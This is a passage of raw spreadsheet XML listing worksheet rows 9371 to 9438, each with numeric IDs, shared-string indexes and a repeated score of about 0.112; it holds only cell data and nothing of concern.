      <c r="D9371" s="2">
        <v>1.0</v>
      </c>
      <c r="E9371" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9371" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9372" ht="15.75" customHeight="1">
      <c r="A9372" s="1">
        <v>5141.0</v>
      </c>
      <c r="B9372" s="2">
        <v>4.4645403E7</v>
      </c>
      <c r="C9372" s="2" t="s">
        <v>8945</v>
      </c>
      <c r="D9372" s="2">
        <v>1.0</v>
      </c>
      <c r="E9372" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9372" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9373" ht="15.75" customHeight="1">
      <c r="A9373" s="1">
        <v>5227.0</v>
      </c>
      <c r="B9373" s="2">
        <v>4.4978143E7</v>
      </c>
      <c r="C9373" s="2" t="s">
        <v>8946</v>
      </c>
      <c r="D9373" s="2">
        <v>1.0</v>
      </c>
      <c r="E9373" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9373" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9374" ht="15.75" customHeight="1">
      <c r="A9374" s="1">
        <v>5325.0</v>
      </c>
      <c r="B9374" s="2">
        <v>4.5297871E7</v>
      </c>
      <c r="C9374" s="2" t="s">
        <v>8947</v>
      </c>
      <c r="D9374" s="2">
        <v>1.0</v>
      </c>
      <c r="E9374" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9374" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9375" ht="15.75" customHeight="1">
      <c r="A9375" s="1">
        <v>5493.0</v>
      </c>
      <c r="B9375" s="2">
        <v>4.5785122E7</v>
      </c>
      <c r="C9375" s="2" t="s">
        <v>8948</v>
      </c>
      <c r="D9375" s="2">
        <v>1.0</v>
      </c>
      <c r="E9375" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9375" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9376" ht="15.75" customHeight="1">
      <c r="A9376" s="1">
        <v>5831.0</v>
      </c>
      <c r="B9376" s="2">
        <v>4.6900686E7</v>
      </c>
      <c r="C9376" s="2" t="s">
        <v>8949</v>
      </c>
      <c r="D9376" s="2">
        <v>1.0</v>
      </c>
      <c r="E9376" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9376" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9377" ht="15.75" customHeight="1">
      <c r="A9377" s="1">
        <v>5906.0</v>
      </c>
      <c r="B9377" s="2">
        <v>4.720021E7</v>
      </c>
      <c r="C9377" s="2" t="s">
        <v>8950</v>
      </c>
      <c r="D9377" s="2">
        <v>1.0</v>
      </c>
      <c r="E9377" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9377" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9378" ht="15.75" customHeight="1">
      <c r="A9378" s="1">
        <v>5967.0</v>
      </c>
      <c r="B9378" s="2">
        <v>4.7329755E7</v>
      </c>
      <c r="C9378" s="2" t="s">
        <v>8951</v>
      </c>
      <c r="D9378" s="2">
        <v>1.0</v>
      </c>
      <c r="E9378" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9378" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9379" ht="15.75" customHeight="1">
      <c r="A9379" s="1">
        <v>5976.0</v>
      </c>
      <c r="B9379" s="2">
        <v>4.7376575E7</v>
      </c>
      <c r="C9379" s="2" t="s">
        <v>8952</v>
      </c>
      <c r="D9379" s="2">
        <v>1.0</v>
      </c>
      <c r="E9379" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9379" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9380" ht="15.75" customHeight="1">
      <c r="A9380" s="1">
        <v>6191.0</v>
      </c>
      <c r="B9380" s="2">
        <v>4.7914856E7</v>
      </c>
      <c r="C9380" s="2" t="s">
        <v>8953</v>
      </c>
      <c r="D9380" s="2">
        <v>1.0</v>
      </c>
      <c r="E9380" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9380" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9381" ht="15.75" customHeight="1">
      <c r="A9381" s="1">
        <v>6449.0</v>
      </c>
      <c r="B9381" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C9381" s="2" t="s">
        <v>8954</v>
      </c>
      <c r="D9381" s="2">
        <v>1.0</v>
      </c>
      <c r="E9381" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9381" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9382" ht="15.75" customHeight="1">
      <c r="A9382" s="1">
        <v>6663.0</v>
      </c>
      <c r="B9382" s="2">
        <v>4.9111227E7</v>
      </c>
      <c r="C9382" s="2" t="s">
        <v>8955</v>
      </c>
      <c r="D9382" s="2">
        <v>1.0</v>
      </c>
      <c r="E9382" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9382" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9383" ht="15.75" customHeight="1">
      <c r="A9383" s="1">
        <v>7020.0</v>
      </c>
      <c r="B9383" s="2">
        <v>5.0096984E7</v>
      </c>
      <c r="C9383" s="2" t="s">
        <v>8956</v>
      </c>
      <c r="D9383" s="2">
        <v>1.0</v>
      </c>
      <c r="E9383" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9383" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9384" ht="15.75" customHeight="1">
      <c r="A9384" s="1">
        <v>7069.0</v>
      </c>
      <c r="B9384" s="2">
        <v>5.0241627E7</v>
      </c>
      <c r="C9384" s="2" t="s">
        <v>8957</v>
      </c>
      <c r="D9384" s="2">
        <v>1.0</v>
      </c>
      <c r="E9384" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9384" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9385" ht="15.75" customHeight="1">
      <c r="A9385" s="1">
        <v>7358.0</v>
      </c>
      <c r="B9385" s="2">
        <v>5.099996E7</v>
      </c>
      <c r="C9385" s="2" t="s">
        <v>8958</v>
      </c>
      <c r="D9385" s="2">
        <v>1.0</v>
      </c>
      <c r="E9385" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9385" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9386" ht="15.75" customHeight="1">
      <c r="A9386" s="1">
        <v>7599.0</v>
      </c>
      <c r="B9386" s="2">
        <v>5.1632224E7</v>
      </c>
      <c r="C9386" s="2" t="s">
        <v>8959</v>
      </c>
      <c r="D9386" s="2">
        <v>1.0</v>
      </c>
      <c r="E9386" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9386" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9387" ht="15.75" customHeight="1">
      <c r="A9387" s="1">
        <v>7624.0</v>
      </c>
      <c r="B9387" s="2">
        <v>5.1737436E7</v>
      </c>
      <c r="C9387" s="2" t="s">
        <v>8960</v>
      </c>
      <c r="D9387" s="2">
        <v>1.0</v>
      </c>
      <c r="E9387" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9387" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9388" ht="15.75" customHeight="1">
      <c r="A9388" s="1">
        <v>7770.0</v>
      </c>
      <c r="B9388" s="2">
        <v>5.2126525E7</v>
      </c>
      <c r="C9388" s="2" t="s">
        <v>8961</v>
      </c>
      <c r="D9388" s="2">
        <v>1.0</v>
      </c>
      <c r="E9388" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9388" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9389" ht="15.75" customHeight="1">
      <c r="A9389" s="1">
        <v>8012.0</v>
      </c>
      <c r="B9389" s="2">
        <v>5.2786827E7</v>
      </c>
      <c r="C9389" s="2" t="s">
        <v>8962</v>
      </c>
      <c r="D9389" s="2">
        <v>1.0</v>
      </c>
      <c r="E9389" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9389" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9390" ht="15.75" customHeight="1">
      <c r="A9390" s="1">
        <v>8033.0</v>
      </c>
      <c r="B9390" s="2">
        <v>5.2827628E7</v>
      </c>
      <c r="C9390" s="2" t="s">
        <v>8963</v>
      </c>
      <c r="D9390" s="2">
        <v>1.0</v>
      </c>
      <c r="E9390" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9390" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9391" ht="15.75" customHeight="1">
      <c r="A9391" s="1">
        <v>8050.0</v>
      </c>
      <c r="B9391" s="2">
        <v>5.2859368E7</v>
      </c>
      <c r="C9391" s="2" t="s">
        <v>8964</v>
      </c>
      <c r="D9391" s="2">
        <v>1.0</v>
      </c>
      <c r="E9391" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9391" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9392" ht="15.75" customHeight="1">
      <c r="A9392" s="1">
        <v>8226.0</v>
      </c>
      <c r="B9392" s="2">
        <v>5.3350333E7</v>
      </c>
      <c r="C9392" s="2" t="s">
        <v>8965</v>
      </c>
      <c r="D9392" s="2">
        <v>1.0</v>
      </c>
      <c r="E9392" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9392" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9393" ht="15.75" customHeight="1">
      <c r="A9393" s="1">
        <v>8437.0</v>
      </c>
      <c r="B9393" s="2">
        <v>5.3954461E7</v>
      </c>
      <c r="C9393" s="2" t="s">
        <v>8966</v>
      </c>
      <c r="D9393" s="2">
        <v>1.0</v>
      </c>
      <c r="E9393" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9393" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9394" ht="15.75" customHeight="1">
      <c r="A9394" s="1">
        <v>8800.0</v>
      </c>
      <c r="B9394" s="2">
        <v>5.4611684E7</v>
      </c>
      <c r="C9394" s="2" t="s">
        <v>8967</v>
      </c>
      <c r="D9394" s="2">
        <v>1.0</v>
      </c>
      <c r="E9394" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9394" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9395" ht="15.75" customHeight="1">
      <c r="A9395" s="1">
        <v>8910.0</v>
      </c>
      <c r="B9395" s="2">
        <v>5.4806777E7</v>
      </c>
      <c r="C9395" s="2" t="s">
        <v>8968</v>
      </c>
      <c r="D9395" s="2">
        <v>1.0</v>
      </c>
      <c r="E9395" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9395" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9396" ht="15.75" customHeight="1">
      <c r="A9396" s="1">
        <v>9017.0</v>
      </c>
      <c r="B9396" s="2">
        <v>5.4997398E7</v>
      </c>
      <c r="C9396" s="2" t="s">
        <v>8969</v>
      </c>
      <c r="D9396" s="2">
        <v>1.0</v>
      </c>
      <c r="E9396" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9396" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9397" ht="15.75" customHeight="1">
      <c r="A9397" s="1">
        <v>9292.0</v>
      </c>
      <c r="B9397" s="2">
        <v>5.5551612E7</v>
      </c>
      <c r="C9397" s="2" t="s">
        <v>8970</v>
      </c>
      <c r="D9397" s="2">
        <v>1.0</v>
      </c>
      <c r="E9397" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9397" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9398" ht="15.75" customHeight="1">
      <c r="A9398" s="1">
        <v>9307.0</v>
      </c>
      <c r="B9398" s="2">
        <v>5.5566164E7</v>
      </c>
      <c r="C9398" s="2" t="s">
        <v>8971</v>
      </c>
      <c r="D9398" s="2">
        <v>1.0</v>
      </c>
      <c r="E9398" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9398" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9399" ht="15.75" customHeight="1">
      <c r="A9399" s="1">
        <v>9491.0</v>
      </c>
      <c r="B9399" s="2">
        <v>5.5917378E7</v>
      </c>
      <c r="C9399" s="2" t="s">
        <v>8972</v>
      </c>
      <c r="D9399" s="2">
        <v>1.0</v>
      </c>
      <c r="E9399" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9399" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9400" ht="15.75" customHeight="1">
      <c r="A9400" s="1">
        <v>9667.0</v>
      </c>
      <c r="B9400" s="2">
        <v>5.6307237E7</v>
      </c>
      <c r="C9400" s="2" t="s">
        <v>8973</v>
      </c>
      <c r="D9400" s="2">
        <v>1.0</v>
      </c>
      <c r="E9400" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9400" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9401" ht="15.75" customHeight="1">
      <c r="A9401" s="1">
        <v>9911.0</v>
      </c>
      <c r="B9401" s="2">
        <v>5.6791996E7</v>
      </c>
      <c r="C9401" s="2" t="s">
        <v>8974</v>
      </c>
      <c r="D9401" s="2">
        <v>1.0</v>
      </c>
      <c r="E9401" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9401" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9402" ht="15.75" customHeight="1">
      <c r="A9402" s="1">
        <v>9986.0</v>
      </c>
      <c r="B9402" s="2">
        <v>5.6972943E7</v>
      </c>
      <c r="C9402" s="2" t="s">
        <v>8975</v>
      </c>
      <c r="D9402" s="2">
        <v>1.0</v>
      </c>
      <c r="E9402" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9402" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9403" ht="15.75" customHeight="1">
      <c r="A9403" s="1">
        <v>10248.0</v>
      </c>
      <c r="B9403" s="2">
        <v>5.7546671E7</v>
      </c>
      <c r="C9403" s="2" t="s">
        <v>8976</v>
      </c>
      <c r="D9403" s="2">
        <v>1.0</v>
      </c>
      <c r="E9403" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9403" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9404" ht="15.75" customHeight="1">
      <c r="A9404" s="1">
        <v>10455.0</v>
      </c>
      <c r="B9404" s="2">
        <v>1.0626375E7</v>
      </c>
      <c r="C9404" s="2" t="s">
        <v>8977</v>
      </c>
      <c r="D9404" s="2">
        <v>1.0</v>
      </c>
      <c r="E9404" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9404" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9405" ht="15.75" customHeight="1">
      <c r="A9405" s="1">
        <v>10823.0</v>
      </c>
      <c r="B9405" s="2">
        <v>1.5886947E7</v>
      </c>
      <c r="C9405" s="2" t="s">
        <v>8978</v>
      </c>
      <c r="D9405" s="2">
        <v>1.0</v>
      </c>
      <c r="E9405" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9405" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9406" ht="15.75" customHeight="1">
      <c r="A9406" s="1">
        <v>10953.0</v>
      </c>
      <c r="B9406" s="2">
        <v>1.7124671E7</v>
      </c>
      <c r="C9406" s="2" t="s">
        <v>8979</v>
      </c>
      <c r="D9406" s="2">
        <v>1.0</v>
      </c>
      <c r="E9406" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9406" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9407" ht="15.75" customHeight="1">
      <c r="A9407" s="1">
        <v>11107.0</v>
      </c>
      <c r="B9407" s="2">
        <v>1.8658602E7</v>
      </c>
      <c r="C9407" s="2" t="s">
        <v>8980</v>
      </c>
      <c r="D9407" s="2">
        <v>1.0</v>
      </c>
      <c r="E9407" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9407" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9408" ht="15.75" customHeight="1">
      <c r="A9408" s="1">
        <v>11113.0</v>
      </c>
      <c r="B9408" s="2">
        <v>1.8827352E7</v>
      </c>
      <c r="C9408" s="2" t="s">
        <v>8981</v>
      </c>
      <c r="D9408" s="2">
        <v>1.0</v>
      </c>
      <c r="E9408" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9408" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9409" ht="15.75" customHeight="1">
      <c r="A9409" s="1">
        <v>11416.0</v>
      </c>
      <c r="B9409" s="2">
        <v>2.1661495E7</v>
      </c>
      <c r="C9409" s="2" t="s">
        <v>8982</v>
      </c>
      <c r="D9409" s="2">
        <v>1.0</v>
      </c>
      <c r="E9409" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9409" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9410" ht="15.75" customHeight="1">
      <c r="A9410" s="1">
        <v>11534.0</v>
      </c>
      <c r="B9410" s="2">
        <v>2.2566395E7</v>
      </c>
      <c r="C9410" s="2" t="s">
        <v>8983</v>
      </c>
      <c r="D9410" s="2">
        <v>1.0</v>
      </c>
      <c r="E9410" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9410" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9411" ht="15.75" customHeight="1">
      <c r="A9411" s="1">
        <v>11767.0</v>
      </c>
      <c r="B9411" s="2">
        <v>2.4210313E7</v>
      </c>
      <c r="C9411" s="2" t="s">
        <v>8984</v>
      </c>
      <c r="D9411" s="2">
        <v>1.0</v>
      </c>
      <c r="E9411" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9411" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9412" ht="15.75" customHeight="1">
      <c r="A9412" s="1">
        <v>11818.0</v>
      </c>
      <c r="B9412" s="2">
        <v>2.4590027E7</v>
      </c>
      <c r="C9412" s="2" t="s">
        <v>8985</v>
      </c>
      <c r="D9412" s="2">
        <v>1.0</v>
      </c>
      <c r="E9412" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9412" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9413" ht="15.75" customHeight="1">
      <c r="A9413" s="1">
        <v>12148.0</v>
      </c>
      <c r="B9413" s="2">
        <v>2.7238844E7</v>
      </c>
      <c r="C9413" s="2" t="s">
        <v>8986</v>
      </c>
      <c r="D9413" s="2">
        <v>1.0</v>
      </c>
      <c r="E9413" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9413" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9414" ht="15.75" customHeight="1">
      <c r="A9414" s="1">
        <v>12448.0</v>
      </c>
      <c r="B9414" s="2">
        <v>2.9300802E7</v>
      </c>
      <c r="C9414" s="2" t="s">
        <v>8987</v>
      </c>
      <c r="D9414" s="2">
        <v>1.0</v>
      </c>
      <c r="E9414" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9414" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9415" ht="15.75" customHeight="1">
      <c r="A9415" s="1">
        <v>13253.0</v>
      </c>
      <c r="B9415" s="2">
        <v>3.4286199E7</v>
      </c>
      <c r="C9415" s="2" t="s">
        <v>8988</v>
      </c>
      <c r="D9415" s="2">
        <v>1.0</v>
      </c>
      <c r="E9415" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9415" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9416" ht="15.75" customHeight="1">
      <c r="A9416" s="1">
        <v>13649.0</v>
      </c>
      <c r="B9416" s="2">
        <v>3.5932025E7</v>
      </c>
      <c r="C9416" s="2" t="s">
        <v>8989</v>
      </c>
      <c r="D9416" s="2">
        <v>1.0</v>
      </c>
      <c r="E9416" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9416" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9417" ht="15.75" customHeight="1">
      <c r="A9417" s="1">
        <v>13726.0</v>
      </c>
      <c r="B9417" s="2">
        <v>3.6360656E7</v>
      </c>
      <c r="C9417" s="2" t="s">
        <v>8990</v>
      </c>
      <c r="D9417" s="2">
        <v>1.0</v>
      </c>
      <c r="E9417" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9417" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9418" ht="15.75" customHeight="1">
      <c r="A9418" s="1">
        <v>13791.0</v>
      </c>
      <c r="B9418" s="2">
        <v>3.6584132E7</v>
      </c>
      <c r="C9418" s="2" t="s">
        <v>8991</v>
      </c>
      <c r="D9418" s="2">
        <v>1.0</v>
      </c>
      <c r="E9418" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9418" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9419" ht="15.75" customHeight="1">
      <c r="A9419" s="1">
        <v>14063.0</v>
      </c>
      <c r="B9419" s="2">
        <v>3.7586289E7</v>
      </c>
      <c r="C9419" s="2" t="s">
        <v>8992</v>
      </c>
      <c r="D9419" s="2">
        <v>1.0</v>
      </c>
      <c r="E9419" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9419" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9420" ht="15.75" customHeight="1">
      <c r="A9420" s="1">
        <v>14727.0</v>
      </c>
      <c r="B9420" s="2">
        <v>4.067518E7</v>
      </c>
      <c r="C9420" s="2" t="s">
        <v>8993</v>
      </c>
      <c r="D9420" s="2">
        <v>1.0</v>
      </c>
      <c r="E9420" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9420" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9421" ht="15.75" customHeight="1">
      <c r="A9421" s="1">
        <v>15138.0</v>
      </c>
      <c r="B9421" s="2">
        <v>4.1922373E7</v>
      </c>
      <c r="C9421" s="2" t="s">
        <v>8994</v>
      </c>
      <c r="D9421" s="2">
        <v>1.0</v>
      </c>
      <c r="E9421" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9421" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9422" ht="15.75" customHeight="1">
      <c r="A9422" s="1">
        <v>15431.0</v>
      </c>
      <c r="B9422" s="2">
        <v>4.2962148E7</v>
      </c>
      <c r="C9422" s="2" t="s">
        <v>8995</v>
      </c>
      <c r="D9422" s="2">
        <v>1.0</v>
      </c>
      <c r="E9422" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9422" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9423" ht="15.75" customHeight="1">
      <c r="A9423" s="1">
        <v>15518.0</v>
      </c>
      <c r="B9423" s="2">
        <v>4.3284223E7</v>
      </c>
      <c r="C9423" s="2" t="s">
        <v>8996</v>
      </c>
      <c r="D9423" s="2">
        <v>1.0</v>
      </c>
      <c r="E9423" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9423" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9424" ht="15.75" customHeight="1">
      <c r="A9424" s="1">
        <v>15914.0</v>
      </c>
      <c r="B9424" s="2">
        <v>4.4655493E7</v>
      </c>
      <c r="C9424" s="2" t="s">
        <v>8997</v>
      </c>
      <c r="D9424" s="2">
        <v>1.0</v>
      </c>
      <c r="E9424" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9424" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9425" ht="15.75" customHeight="1">
      <c r="A9425" s="1">
        <v>15937.0</v>
      </c>
      <c r="B9425" s="2">
        <v>4.4726856E7</v>
      </c>
      <c r="C9425" s="2" t="s">
        <v>8998</v>
      </c>
      <c r="D9425" s="2">
        <v>1.0</v>
      </c>
      <c r="E9425" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9425" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9426" ht="15.75" customHeight="1">
      <c r="A9426" s="1">
        <v>16053.0</v>
      </c>
      <c r="B9426" s="2">
        <v>4.5228712E7</v>
      </c>
      <c r="C9426" s="2" t="s">
        <v>8999</v>
      </c>
      <c r="D9426" s="2">
        <v>1.0</v>
      </c>
      <c r="E9426" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9426" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9427" ht="15.75" customHeight="1">
      <c r="A9427" s="1">
        <v>16062.0</v>
      </c>
      <c r="B9427" s="2">
        <v>4.5290009E7</v>
      </c>
      <c r="C9427" s="2" t="s">
        <v>9000</v>
      </c>
      <c r="D9427" s="2">
        <v>1.0</v>
      </c>
      <c r="E9427" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9427" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9428" ht="15.75" customHeight="1">
      <c r="A9428" s="1">
        <v>16092.0</v>
      </c>
      <c r="B9428" s="2">
        <v>4.5386471E7</v>
      </c>
      <c r="C9428" s="2" t="s">
        <v>9001</v>
      </c>
      <c r="D9428" s="2">
        <v>1.0</v>
      </c>
      <c r="E9428" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9428" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9429" ht="15.75" customHeight="1">
      <c r="A9429" s="1">
        <v>16144.0</v>
      </c>
      <c r="B9429" s="2">
        <v>4.5570751E7</v>
      </c>
      <c r="C9429" s="2" t="s">
        <v>9002</v>
      </c>
      <c r="D9429" s="2">
        <v>1.0</v>
      </c>
      <c r="E9429" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9429" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9430" ht="15.75" customHeight="1">
      <c r="A9430" s="1">
        <v>16423.0</v>
      </c>
      <c r="B9430" s="2">
        <v>4.6314391E7</v>
      </c>
      <c r="C9430" s="2" t="s">
        <v>9003</v>
      </c>
      <c r="D9430" s="2">
        <v>1.0</v>
      </c>
      <c r="E9430" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9430" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9431" ht="15.75" customHeight="1">
      <c r="A9431" s="1">
        <v>16539.0</v>
      </c>
      <c r="B9431" s="2">
        <v>4.6774875E7</v>
      </c>
      <c r="C9431" s="2" t="s">
        <v>9004</v>
      </c>
      <c r="D9431" s="2">
        <v>1.0</v>
      </c>
      <c r="E9431" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9431" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9432" ht="15.75" customHeight="1">
      <c r="A9432" s="1">
        <v>16629.0</v>
      </c>
      <c r="B9432" s="2">
        <v>4.7071087E7</v>
      </c>
      <c r="C9432" s="2" t="s">
        <v>9005</v>
      </c>
      <c r="D9432" s="2">
        <v>1.0</v>
      </c>
      <c r="E9432" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9432" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9433" ht="15.75" customHeight="1">
      <c r="A9433" s="1">
        <v>16764.0</v>
      </c>
      <c r="B9433" s="2">
        <v>4.7631719E7</v>
      </c>
      <c r="C9433" s="2" t="s">
        <v>9006</v>
      </c>
      <c r="D9433" s="2">
        <v>1.0</v>
      </c>
      <c r="E9433" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9433" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9434" ht="15.75" customHeight="1">
      <c r="A9434" s="1">
        <v>16883.0</v>
      </c>
      <c r="B9434" s="2">
        <v>4.8012696E7</v>
      </c>
      <c r="C9434" s="2" t="s">
        <v>9007</v>
      </c>
      <c r="D9434" s="2">
        <v>1.0</v>
      </c>
      <c r="E9434" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9434" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9435" ht="15.75" customHeight="1">
      <c r="A9435" s="1">
        <v>16993.0</v>
      </c>
      <c r="B9435" s="2">
        <v>4.8393041E7</v>
      </c>
      <c r="C9435" s="2" t="s">
        <v>9008</v>
      </c>
      <c r="D9435" s="2">
        <v>1.0</v>
      </c>
      <c r="E9435" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9435" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9436" ht="15.75" customHeight="1">
      <c r="A9436" s="1">
        <v>17148.0</v>
      </c>
      <c r="B9436" s="2">
        <v>4.8850061E7</v>
      </c>
      <c r="C9436" s="2" t="s">
        <v>9009</v>
      </c>
      <c r="D9436" s="2">
        <v>1.0</v>
      </c>
      <c r="E9436" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9436" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9437" ht="15.75" customHeight="1">
      <c r="A9437" s="1">
        <v>17758.0</v>
      </c>
      <c r="B9437" s="2">
        <v>5.071535E7</v>
      </c>
      <c r="C9437" s="2" t="s">
        <v>9010</v>
      </c>
      <c r="D9437" s="2">
        <v>1.0</v>
      </c>
      <c r="E9437" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9437" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9438" ht="15.75" customHeight="1">
      <c r="A9438" s="1">
        <v>17771.0</v>
      </c>
      <c r="B9438" s="2">
        <v>5.0757292E7</v>
      </c>
      <c r="C9438" s="2" t="s">
        <v>9011</v>
